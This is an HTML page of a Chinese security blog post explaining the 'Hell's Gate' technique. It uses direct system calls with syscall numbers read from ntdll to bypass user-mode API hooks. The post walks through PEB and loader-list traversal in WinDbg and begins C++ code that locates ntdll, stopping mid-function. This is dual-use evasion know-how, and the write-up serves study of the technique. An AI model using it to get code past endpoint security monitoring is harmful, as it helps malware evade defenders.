<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="Hugo 0.88.1" />

  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Muxue" />
  <meta property="og:url" content="https://secxue.github.io/posts/hells-gate/" />
  <link rel="canonical" href="https://secxue.github.io/posts/hells-gate/" /><link rel="alternate" type="application/atom+xml" href="https://secxue.github.ioindex.xml" title="Muxue Blog">

  <script type="application/ld+json">
  {
      "@context" : "http://schema.org",
      "@type" : "BlogPosting",
      "mainEntityOfPage": {
           "@type": "WebPage",
           "@id": "https:\/\/secxue.github.io"
      },
      "articleSection" : "posts",
      "name" : "HellsGate",
      "headline" : "HellsGate",
      "description" : "简介 也就是地狱之门，涉及到的前置知识是PEB。\n原理就是从内存里的ntdll中读取到的系统调用号进行系统直接调用来绕过敏感API函数的hook。主要来应对 对 Ring3 API 的 HOOK，不同版本的 Windows Nt*函数的系统调用号不同，。\n前置知识 PEB可以在 x86 进程的线程环境块(TEB)中的 fs:[0x30] 以及 x64 进程的 GS:[0x60] 中找到。\n这里就涉及到了两个API\n __readgsqword __readfsqword   看名称也可以看出来fs和gs嘛\n 可以看见TEB结构体里有PEB\n先获得TEB、PEB的地址：r $teb，r $peb\nPEB里一个属性Ldr指向了_PEB_LDR_DATA结构，这个结构里就存储着所需的信息\nInLoadOrderModuleList: 指的是模块加载的顺序 InMemoryOrderModuleList: 指的是在内存的排列顺序 InInitializationOrderModuleLists: 指的是模块初始化装载顺序\n 那么到底用哪个，差别是什么可以在参考链接里的第一个先知文章里找到答案\n 双向链表的头部包含进程的加载模块。链表的每一个都是指向LDR_DATA_TABLE_ENTRY 结构的指针\n所以InMemoryOrderModuleList里的Flink的地址，指向了一个LDR_DATA_TABLE_ENTRY\nFlink总是指向下一个_LDR_DATA_TABLE_ENTRY结构对应加载顺序的Flink指针\n我们所需的就是_LDR_DATA_TABLE_ENTRY-\u0026gt;Flink.Flink这个地址\n如果是_LDR_DATA_TABLE_ENTRY-\u0026gt;Flink地址，就是我们第一个的模块\n 记住0x0000014d`0a0223c0，下一个就用它\n  然后再记0x0000014d`0a0229e0，下一个用它\n 就这样可以循环下去\n可以查看下dll载入内存的顺序\n上面用到的-0x10是啥嘞，就是为了对齐。\n这个结构如果是x86的就是8个字节，x64的就是16个字节\n使用InMemoryOrderModuleList来查找\n我们要对齐，对齐方式就是-16个字节\n如果不进行对齐的话\n 可以看见两图 明显不一样\n 实现一个遍历ntdll.dll里所有导出函数的代码，直接拿的cRIspr师傅的，然后我改了一下。\n#include \u0026lt;iostream\u0026gt;#include \u0026lt;intrin.h\u0026gt;#include \u0026lt;Windows.h\u0026gt;#include \u0026lt;winternl.",
      "inLanguage" : "en-US",
      "author" : "Muxue",
      "creator" : "Muxue",
      "publisher": "Muxue",
      "accountablePerson" : "Muxue",
      "copyrightHolder" : "Muxue",
      "copyrightYear" : "2022",
      "datePublished": "2022-03-25 08:41:59 \u002b0800 CST",
      "dateModified" : "2022-03-25 08:41:59 \u002b0800 CST",
      "url" : "https:\/\/secxue.github.io\/posts\/hells-gate\/",
      "keywords" : [  ]
  }
</script>
<title>HellsGate</title>
  <meta property="og:title" content="HellsGate" />
  <meta property="og:type" content="article" />
  <meta property="og:description" content="简介 也就是地狱之门，涉及到的前置知识是PEB。
原理就是从内存里的ntdll中读取到的系统调用号进行系统直接调用来绕过敏感API函数的hook。主要来应对 对 Ring3 API 的 HOOK，不同版本的 Windows Nt*函数的系统调用号不同，。
前置知识 PEB可以在 x86 进程的线程环境块(TEB)中的 fs:[0x30] 以及 x64 进程的 GS:[0x60] 中找到。
这里就涉及到了两个API
 __readgsqword __readfsqword   看名称也可以看出来fs和gs嘛
 可以看见TEB结构体里有PEB
先获得TEB、PEB的地址：r $teb，r $peb
PEB里一个属性Ldr指向了_PEB_LDR_DATA结构，这个结构里就存储着所需的信息
InLoadOrderModuleList: 指的是模块加载的顺序 InMemoryOrderModuleList: 指的是在内存的排列顺序 InInitializationOrderModuleLists: 指的是模块初始化装载顺序
 那么到底用哪个，差别是什么可以在参考链接里的第一个先知文章里找到答案
 双向链表的头部包含进程的加载模块。链表的每一个都是指向LDR_DATA_TABLE_ENTRY 结构的指针
所以InMemoryOrderModuleList里的Flink的地址，指向了一个LDR_DATA_TABLE_ENTRY
Flink总是指向下一个_LDR_DATA_TABLE_ENTRY结构对应加载顺序的Flink指针
我们所需的就是_LDR_DATA_TABLE_ENTRY-&amp;gt;Flink.Flink这个地址
如果是_LDR_DATA_TABLE_ENTRY-&amp;gt;Flink地址，就是我们第一个的模块
 记住0x0000014d`0a0223c0，下一个就用它
  然后再记0x0000014d`0a0229e0，下一个用它
 就这样可以循环下去
可以查看下dll载入内存的顺序
上面用到的-0x10是啥嘞，就是为了对齐。
这个结构如果是x86的就是8个字节，x64的就是16个字节
使用InMemoryOrderModuleList来查找
我们要对齐，对齐方式就是-16个字节
如果不进行对齐的话
 可以看见两图 明显不一样
 实现一个遍历ntdll.dll里所有导出函数的代码，直接拿的cRIspr师傅的，然后我改了一下。
#include &amp;lt;iostream&amp;gt;#include &amp;lt;intrin.h&amp;gt;#include &amp;lt;Windows.h&amp;gt;#include &amp;lt;winternl." />
  <meta name="description" content="简介 也就是地狱之门，涉及到的前置知识是PEB。
原理就是从内存里的ntdll中读取到的系统调用号进行系统直接调用来绕过敏感API函数的hook。主要来应对 对 Ring3 API 的 HOOK，不同版本的 Windows Nt*函数的系统调用号不同，。
前置知识 PEB可以在 x86 进程的线程环境块(TEB)中的 fs:[0x30] 以及 x64 进程的 GS:[0x60] 中找到。
这里就涉及到了两个API
 __readgsqword __readfsqword   看名称也可以看出来fs和gs嘛
 可以看见TEB结构体里有PEB
先获得TEB、PEB的地址：r $teb，r $peb
PEB里一个属性Ldr指向了_PEB_LDR_DATA结构，这个结构里就存储着所需的信息
InLoadOrderModuleList: 指的是模块加载的顺序 InMemoryOrderModuleList: 指的是在内存的排列顺序 InInitializationOrderModuleLists: 指的是模块初始化装载顺序
 那么到底用哪个，差别是什么可以在参考链接里的第一个先知文章里找到答案
 双向链表的头部包含进程的加载模块。链表的每一个都是指向LDR_DATA_TABLE_ENTRY 结构的指针
所以InMemoryOrderModuleList里的Flink的地址，指向了一个LDR_DATA_TABLE_ENTRY
Flink总是指向下一个_LDR_DATA_TABLE_ENTRY结构对应加载顺序的Flink指针
我们所需的就是_LDR_DATA_TABLE_ENTRY-&amp;gt;Flink.Flink这个地址
如果是_LDR_DATA_TABLE_ENTRY-&amp;gt;Flink地址，就是我们第一个的模块
 记住0x0000014d`0a0223c0，下一个就用它
  然后再记0x0000014d`0a0229e0，下一个用它
 就这样可以循环下去
可以查看下dll载入内存的顺序
上面用到的-0x10是啥嘞，就是为了对齐。
这个结构如果是x86的就是8个字节，x64的就是16个字节
使用InMemoryOrderModuleList来查找
我们要对齐，对齐方式就是-16个字节
如果不进行对齐的话
 可以看见两图 明显不一样
 实现一个遍历ntdll.dll里所有导出函数的代码，直接拿的cRIspr师傅的，然后我改了一下。
#include &amp;lt;iostream&amp;gt;#include &amp;lt;intrin.h&amp;gt;#include &amp;lt;Windows.h&amp;gt;#include &amp;lt;winternl." />
  <meta property="og:locale" content="en-us" />

  
    <style>body{font-family:bree serif,sans-serif;-webkit-font-smoothing:antialiased;margin:0 20px}article{max-width:800px;margin-left:auto;margin-right:auto}a{color:#000;text-decoration:none}a:hover{font-weight:600;text-decoration:underline}.post-ads{margin:50px 0}.markdown-body{font-size:18px;max-width:100%}.markdown-body a{text-decoration:underline;text-decoration-color:#000}.markdown-body pre{padding:16px;overflow:auto;border-radius:10px}.markdown-body code{padding:.2em .4em;font-size:85%;background-color:#f6f8fa;border-radius:6px}.markdown-body pre>code{padding:0;font-size:100%;background-color:inherit;border:0}.Chinese .markdown-body{line-height:200%}.site-date-catalog{font-size:2rem}.header-title{font-size:2rem;font-weight:700;margin-top:32px;font-family:bungee shade,sans-serif}.header-title a{text-decoration:none}.header-subtitle{color:#666}.header-items{margin:10px 0}.header-item{margin:0 5px}.header-line{width:100%;border-width:2px;border-color:#482936;border-style:solid none none none}.lang-switch{font-weight:600}#posts-list{min-height:600px}.posts-line{font-size:1.2rem;margin:12px 0}.posts-categories{font-size:.8rem;margin:auto;text-align:center}.posts-category{padding:3px 0;border:#000 2px solid;border-radius:5px}.site-footer{margin-top:50px}.site-footer-item{margin-right:12px}.post-content img{max-width:100%;display:block;margin-right:auto;margin-top:12px}.post-header{margin-bottom:50px}.post-title{font-size:2rem;font-weight:600}.post-tags{display:inline;font-weight:600;padding:2px 5px;margin-right:6px;border:#000 2px solid;border-radius:5px}.post-date{font-weight:800;font-style:italic}.post-author{float:right;font-weight:600}.page-content{min-height:60%}.post-content{margin-bottom:50px}.post-content p{hyphens:auto;line-height:1.8;text-justify:ideographic;margin-bottom:1em}.related-content{border-width:3px;border-style:solid;border-color:#000;padding:0 10px;margin-bottom:50px;margin-top:100px}.related-content li{margin:5px 0}.taxonomy-term{font-size:3rem}.gallery-img{text-align:center}.gallery-img span{text-align:center}.gallery-img-desc{font-size:.8em;font-weight:800}#disqus_thread{position:relative}#disqus_thread:after{content:"";display:block;height:55px;width:100%;position:absolute;bottom:0;background:#fff}@media screen and (max-width:600px){.header-title,.header-subtitle,.header-items{text-align:center}.posts-line{font-size:16px}.markdown-body{font-size:16px}.post-title{font-size:2rem}.post-content p{letter-spacing:.05em}}@media screen and (max-width:48em){.posts-category{display:none}}</style>
  
  
    <style>.container,.container-fluid{margin-right:auto;margin-left:auto}.container-fluid{padding-right:2rem;padding-left:2rem}.row{box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-flex:0;-ms-flex:0 1 auto;flex:initial;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-.5rem;margin-left:-.5rem}.row.reverse{-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.col.reverse{-webkit-box-orient:vertical;-webkit-box-direction:reverse;-ms-flex-direction:column-reverse;flex-direction:column-reverse}.col-xs,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-offset-0,.col-xs-offset-1,.col-xs-offset-10,.col-xs-offset-11,.col-xs-offset-12,.col-xs-offset-2,.col-xs-offset-3,.col-xs-offset-4,.col-xs-offset-5,.col-xs-offset-6,.col-xs-offset-7,.col-xs-offset-8,.col-xs-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-xs{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-xs-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-xs-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-xs-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-xs-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-xs-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-xs-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-xs-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-xs-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-xs-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-xs-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-xs-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-xs-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-xs-offset-0{margin-left:0}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-11{margin-left:91.66666667%}.start-xs{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-xs{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-xs{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-xs{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-xs{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-xs{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-xs{-ms-flex-pack:distribute;justify-content:space-around}.between-xs{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-xs{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-xs{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}@media only screen and (min-width:48em){.container{width:49rem}.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-offset-0,.col-sm-offset-1,.col-sm-offset-10,.col-sm-offset-11,.col-sm-offset-12,.col-sm-offset-2,.col-sm-offset-3,.col-sm-offset-4,.col-sm-offset-5,.col-sm-offset-6,.col-sm-offset-7,.col-sm-offset-8,.col-sm-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-sm{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-sm-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-sm-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-sm-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-sm-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-sm-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-sm-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-sm-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-sm-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-sm-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-sm-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-sm-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-sm-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-sm-offset-0{margin-left:0}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-11{margin-left:91.66666667%}.start-sm{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-sm{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-sm{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-sm{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-sm{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-sm{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-sm{-ms-flex-pack:distribute;justify-content:space-around}.between-sm{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-sm{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-sm{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:64em){.container{width:65rem}.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-offset-0,.col-md-offset-1,.col-md-offset-10,.col-md-offset-11,.col-md-offset-12,.col-md-offset-2,.col-md-offset-3,.col-md-offset-4,.col-md-offset-5,.col-md-offset-6,.col-md-offset-7,.col-md-offset-8,.col-md-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-md{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-md-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-md-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-md-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-md-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-md-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-md-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-md-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-md-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-md-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-md-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-md-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-md-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-11{margin-left:91.66666667%}.start-md{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-md{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-md{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-md{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-md{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-md{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-md{-ms-flex-pack:distribute;justify-content:space-around}.between-md{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-md{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-md{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:75em){.container{width:76rem}.col-lg,.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-offset-0,.col-lg-offset-1,.col-lg-offset-10,.col-lg-offset-11,.col-lg-offset-12,.col-lg-offset-2,.col-lg-offset-3,.col-lg-offset-4,.col-lg-offset-5,.col-lg-offset-6,.col-lg-offset-7,.col-lg-offset-8,.col-lg-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-lg{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-lg-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-lg-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-lg-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-lg-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-lg-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-lg-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-lg-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-lg-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-lg-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-lg-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-lg-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-lg-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-11{margin-left:91.66666667%}.start-lg{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-lg{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-lg{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-lg{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-lg{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-lg{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-lg{-ms-flex-pack:distribute;justify-content:space-around}.between-lg{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-lg{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-lg{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}</style>
  

  

  <link href="/index.xml" rel="alternate" type="application/rss+xml"
    title="Muxue Blog">
  
  <link rel="preconnect" href="https://fonts.gstatic.com">
  <link href="https://fonts.googleapis.com/css?family=Bree+Serif|Bungee+Shade" rel="stylesheet">
  
  

  
  
</head>


<body>
  <article class="post " id="article">
    <div class="row">
      <div class="col-xs-12">
        <div class="site-header">
          
<header>
  <div class="header-title">
    <a href="/"
      >Muxue</a
    >
  </div>
  <div class="header-subtitle"></div>
</header>
<div class="row end-md center-xs header-items">
  
  <div class="header-item">
    <a href="/about" target="_blank">About</a>
  </div>
  
  <div class="header-item">
    <a href="https://twitter.com/secxue" target="_blank">Twitter</a>
  </div>
  
</div>
<div class="row end-xs">
   
</div>
<div class="header-line"></div>

        </div>
        <header class="post-header">
          <h1 class="post-title">HellsGate</h1>
          
          <div class="row post-desc">
            <div class="col-xs-6">
              
              <time class="post-date" datetime="2022-03-25 08:41:59 CST">
                25 Mar 2022
              </time>
              
            </div>
            <div class="col-xs-6">
              
              <div class="post-author">
                <a target="_blank" href="https://github.com/muxue">@Muxue</a>
              </div>
              
            </div>
          </div>
          
        </header>

        <div class="post-content markdown-body">
          
          <h2 id="简介">简介</h2>
<p>也就是地狱之门，涉及到的前置知识是PEB。</p>
<p>原理就是从内存里的<code>ntdll</code>中读取到的系统调用号进行系统直接调用来绕过敏感API函数的hook。主要来应对 对 Ring3 API 的 HOOK，不同版本的 Windows Nt*函数的系统调用号不同，。</p>
<h2 id="前置知识">前置知识</h2>
<p><code>PEB</code>可以在 x86 进程的线程环境块(<code>TEB</code>)中的 fs:[0x30] 以及 x64 进程的 GS:[0x60] 中找到。</p>
<p>这里就涉及到了两个API</p>
<ul>
<li><a href="https://docs.microsoft.com/en-us/cpp/intrinsics/readgsbyte-readgsdword-readgsqword-readgsword?view=msvc-170&amp;viewFallbackFrom=vs-2019"><strong>__readgsqword</strong></a></li>
<li><a href="https://docs.microsoft.com/en-us/cpp/intrinsics/readfsbyte-readfsdword-readfsqword-readfsword?view=msvc-170&amp;viewFallbackFrom=vs-2019"><strong>__readfsqword</strong></a></li>
</ul>
<blockquote>
<p>看名称也可以看出来fs和gs嘛</p>
</blockquote>
<p><img src="/images/HellsGate/image-20220325084616364.png" alt="image-20220325084616364"></p>
<p>可以看见TEB结构体里有PEB</p>
<p>先获得TEB、PEB的地址：<code>r $teb</code>，<code>r $peb</code></p>
<p>PEB里一个属性<code>Ldr</code>指向了<code>_PEB_LDR_DATA</code>结构，这个结构里就存储着所需的信息</p>
<p><code>InLoadOrderModuleList</code>: 指的是模块加载的顺序 <code>InMemoryOrderModuleList</code>: 指的是在内存的排列顺序 <code>InInitializationOrderModuleLists</code>: 指的是模块初始化装载顺序</p>
<blockquote>
<p>那么到底用哪个，差别是什么可以在参考链接里的第一个先知文章里找到答案</p>
</blockquote>
<p><img src="/images/HellsGate/image-20220325084648275.png" alt="image-20220325084648275"></p>
<p>双向链表的头部包含进程的加载模块。链表的每一个都是指向<code>LDR_DATA_TABLE_ENTRY</code> 结构的指针</p>
<p>所以<code>InMemoryOrderModuleList</code>里的<code>Flink</code>的地址，指向了一个<code>LDR_DATA_TABLE_ENTRY</code></p>
<p>Flink总是指向下一个<code>_LDR_DATA_TABLE_ENTRY</code>结构对应加载顺序的<code>Flink</code>指针</p>
<p>我们所需的就是<code>_LDR_DATA_TABLE_ENTRY-&gt;Flink.Flink</code>这个地址</p>
<p>如果是<code>_LDR_DATA_TABLE_ENTRY-&gt;Flink</code>地址，就是我们第一个的模块</p>
<p><img src="/images/HellsGate/image-20220325084715996.png" alt="image-20220325084715996"></p>
<blockquote>
<p>记住0x0000014d`0a0223c0，下一个就用它</p>
</blockquote>
<p><img src="/images/HellsGate/image-20220325084828209.png" alt="image-20220325084828209"></p>
<blockquote>
<p>然后再记0x0000014d`0a0229e0，下一个用它</p>
</blockquote>
<p><img src="/images/HellsGate/image-20220325084845660.png" alt="image-20220325084845660"></p>
<p>就这样可以循环下去</p>
<p><img src="/images/HellsGate/image-20220325084907041.png" alt="image-20220325084907041"></p>
<p>可以查看下dll载入内存的顺序</p>
<p><img src="/images/HellsGate/image-20220325084925211.png" alt="image-20220325084925211"></p>
<p>上面用到的-0x10是啥嘞，就是为了对齐。</p>
<p>这个结构如果是x86的就是8个字节，x64的就是16个字节</p>
<p>使用<code>InMemoryOrderModuleList</code>来查找</p>
<p>我们要对齐，对齐方式就是-16个字节</p>
<p><img src="/images/HellsGate/image-20220325084944640.png" alt="image-20220325084944640"></p>
<p>如果不进行对齐的话</p>
<p><img src="/images/HellsGate/image-20220325085000847.png" alt="image-20220325085000847"></p>
<blockquote>
<p>可以看见两图 明显不一样</p>
</blockquote>
<p>实现一个遍历ntdll.dll里所有导出函数的代码，直接拿的cRIspr师傅的，然后我改了一下。</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;iostream&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;intrin.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Windows.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;winternl.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">GetPeHeader</span>()
{
	PBYTE ImageBase;
	PIMAGE_DOS_HEADER Dos <span style="color:#f92672">=</span> NULL;
	PIMAGE_NT_HEADERS Nt <span style="color:#f92672">=</span> NULL;
	PIMAGE_FILE_HEADER File <span style="color:#f92672">=</span> NULL;
	PIMAGE_OPTIONAL_HEADER Optional <span style="color:#f92672">=</span> NULL;
	PIMAGE_EXPORT_DIRECTORY ExportTable <span style="color:#f92672">=</span> NULL;

	PPEB Peb <span style="color:#f92672">=</span> (PPEB)__readgsqword(<span style="color:#ae81ff">0x60</span>);		<span style="color:#75715e">// 定位到PEB
</span><span style="color:#75715e"></span>	PLDR_DATA_TABLE_ENTRY pLoadModule;
	<span style="color:#75715e">// NTDLL
</span><span style="color:#75715e"></span>	pLoadModule <span style="color:#f92672">=</span> (PLDR_DATA_TABLE_ENTRY)((PBYTE)Peb<span style="color:#f92672">-&gt;</span>Ldr<span style="color:#f92672">-&gt;</span>InMemoryOrderModuleList.Flink<span style="color:#f92672">-&gt;</span>Flink <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x10</span>);		<span style="color:#75715e">// 这种在windbg手动实现了，就是找到了ntdll.dll
